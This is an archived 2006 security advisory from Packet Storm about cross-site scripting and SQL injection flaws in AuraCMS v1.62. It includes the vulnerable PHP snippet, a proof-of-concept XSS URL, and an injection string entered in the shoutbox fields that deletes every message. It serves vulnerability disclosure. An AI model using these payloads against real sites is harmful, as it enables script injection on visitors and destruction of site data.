the internet's safety

01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt

01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
Posted Jul 9, 2006
Authored by inversFX

CMS Aura version 1.62 suffers from cross site scripting flaws.

tags | exploit, xss
MD5 | d18f07c1cb36a64890f709f37ea25505

01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt

Change Mirror Download
by : iFX a.k.a inversFX
_______________________________
[ apem-zigzag@telkom.net ]
[ inversfx@yahoo.com ]
-------------------------------
locate : Indonesia, Jakarta
--------------------------------
date : 29/06/2006
--------------------------------
title : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif@ayo.kliksini.com
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
--------------------------------


PoC :
--------------------------------------------------------------------

1. in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....


we found something here, that's variable $judul_artikel
so we can xss from the url :


1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati
dah gwa!!!")</script>

2nd ex:
or we can send an artikel to admin and the title had the
XSS code, so when anonymous is
opening the index.php, the script are running.
---------------------------------------------------------------------

2. we found something here that can be delete all
shoutbox message.
as usually we can shout anonymously with fake name, mail,
pesan.
here when I insert

name = ' or ''=' <== old SQL
injection code
mail = test_string <== you can fill it with free mail
address
pesan = ' or ''=' <== old SQL injection code

then all message on it clear amazingly....



----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------

sory for my words In English, cuz I often REMED!!!
_________________

/Shout :| |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius,
||||||||. |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe,
Shock-3d, G4mMa, Big_Red_One } |
-------------------------------------------------------------------------------------
|OK | Apply | Cancel |
----------------------
========================================================================================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/

Asah pengetahuanmu tentang Piala Dunia di
http://netkuis.telkom.net/pialadunia/
========================================================================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close